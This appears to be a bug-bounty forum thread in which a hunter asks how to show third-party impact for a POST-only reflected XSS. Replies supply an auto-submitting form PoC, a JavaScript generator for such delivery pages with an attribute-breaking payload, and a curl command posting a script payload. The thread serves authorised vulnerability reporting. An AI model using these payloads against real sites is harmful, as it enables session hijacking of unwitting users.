Reflected XSS with Burp

If you can get reflected XSS via a POST request and see the execution by doing right click > Show in browser in Burp, apparently the Hackerone personnel need more info. If this isn’t enough to report an XSS bug, what else could I do to show the impact to third parties? To my knowledge, it’s kind of hard to do with a POST request, as you can’t just copy the URL and send it to a victim. They requested a “step by step PoC to show the impact to third parties”. I guess this is just me being dumb and a noob, but I thought that was enough information to report a bug?

Could you give some more details?
I don’t get the complete picture of what you are doing.

  • What exactly is your payload?
  • Could you give us the URL of the endpoint?
  • What does that endpoint return? JSON, HTML, text or something else?
  • Where is that endpoint used in the normal application workflow?

Just a wild guess about the missing impact:
Imagine you find an endpoint that echoes everything. As long as it’s only accepting POST data and the rest of the web application doesn’t use it anywhere, there is no impact to third parties.

However, if you find that the application uses some JavaScript to extract a URL param, sends it to this echo endpoint and then inserts the response into the user’s document, you could maybe (e.g. if the JS code doesn’t sanitise the param properly) exploit that by crafting a URL with a malicious parameter.
So my guess: you are missing this last part…

Hello @kannix, thank you for your response! I actually figured it out. So, in the POST request, there were a ton of different parameters. I only found that one was vulnerable to XSS. I right-clicked in Burp and changed the request to a GET, tested as is, but was failing with all the parameters. Long story short: I removed all parameters except the one that was vulnerable via the POST method and I was able to get my payload to execute.


Next time you can try something like this:

<form action="vulnerable_url" method="post">
  <!-- the one parameter that is reflected unencoded; its value is the XSS payload -->
  <input type='hidden' name='vulnerable_parameter' value='xss_payload'>
</form>
<script>
  // submit as soon as the page loads, so the victim only has to open the link
  document.forms[0].submit()
</script>

Anyway, you got a better proof of concept than the POST one!

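The auto-submitting form above is the standard way to turn a POST-only reflected XSS into something a third party can be sent: the attacker hosts the page, the victim opens the link, and the browser performs a top-level POST to the vulnerable endpoint and renders the reflected response in the victim's own session. The one-liner breaks, though, as soon as the payload contains a quote or angle bracket, because the attribute value is not encoded. The following is an added example, not code from this thread, that generates such a delivery page with every attribute value HTML-encoded; the target URL, parameter name and payload are placeholders, and the helper names are hypothetical.

```javascript
// Added example (not from the original thread). Generates an attacker-hosted
// HTML page that auto-submits a form to a POST-reflected XSS endpoint, so the
// PoC can be handed to a third party as a single link. All attribute values
// are HTML-encoded so the payload's own quotes and brackets do not break the
// delivery page itself. Names and the target URL below are hypothetical.

// Encode a string for use inside a double-quoted HTML attribute.
function escapeHtmlAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Build the delivery page. `params` maps every parameter the endpoint needs
// (including the ones that are NOT vulnerable) to its value; `method` is
// "POST" by default, or "GET" if the endpoint also accepts query parameters.
function buildAutoSubmitPoc(action, params, method = 'POST') {
  if (!/^https?:\/\//i.test(action)) {
    throw new Error('action must be an absolute http(s) URL, the page is hosted elsewhere');
  }
  const m = method.toUpperCase();
  if (m !== 'POST' && m !== 'GET') throw new Error('method must be POST or GET');

  const inputs = Object.entries(params)
    .map(([name, value]) =>
      `  <input type="hidden" name="${escapeHtmlAttr(name)}" value="${escapeHtmlAttr(value)}">`)
    .join('\n');

  return [
    '<!doctype html>',
    '<html><body>',
    `<form id="poc" action="${escapeHtmlAttr(action)}" method="${m}">`,
    inputs,
    '</form>',
    // Submitting the form is a top-level navigation, so the reflected
    // response is rendered as a page (unlike an XHR/fetch response).
    '<script>document.getElementById("poc").submit();</script>',
    '</body></html>',
    '',
  ].join('\n');
}

// Constructed sample input: a placeholder endpoint and a payload that breaks
// out of a single- or double-quoted attribute and runs in the target origin.
const SAMPLE_ACTION = 'https://target.example/search';
const SAMPLE_PARAMS = {
  q: `'"><img src=x onerror=alert(document.domain)>`,
  page: '1',
};

console.log(buildAutoSubmitPoc(SAMPLE_ACTION, SAMPLE_PARAMS));
```

Two things to check before sending this as a PoC: if the endpoint rejects the request without a session-bound CSRF token or a custom header, a third party cannot trigger it from another origin and the impact is much smaller; and keep the payload at `alert(document.domain)` or similar, which proves execution in the target origin without touching anyone's data.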

Hey @stefanofinding, thank you very much for the response! I’ll definitely keep this in my belt for next time. Appreciate the help!


A lot of times, a cURL request comes in handy:
https://ec.haxx.se/http-post.html

Usually you can find curl in Linux distros (Ubuntu, CentOS, Kali, etc.). Open up bash (sometimes referred to as “the terminal” or “command prompt”) and your command might be something as simple as
# --data-urlencode sends a POST body with the value URL-encoded; inside double quotes a single quote needs no backslash
curl --data-urlencode "param1='><script>confirm(1)</script>" https://www.127.0.0.1.com

It also includes HTTP headers!

Hey, so it’s been a year since you posted. I’m also facing the same scenario right now, where I can get reflected XSS in a GET request from right click > Show in browser. It pops, but only once, when I paste and run it in the browser. So can anyone help me solve it?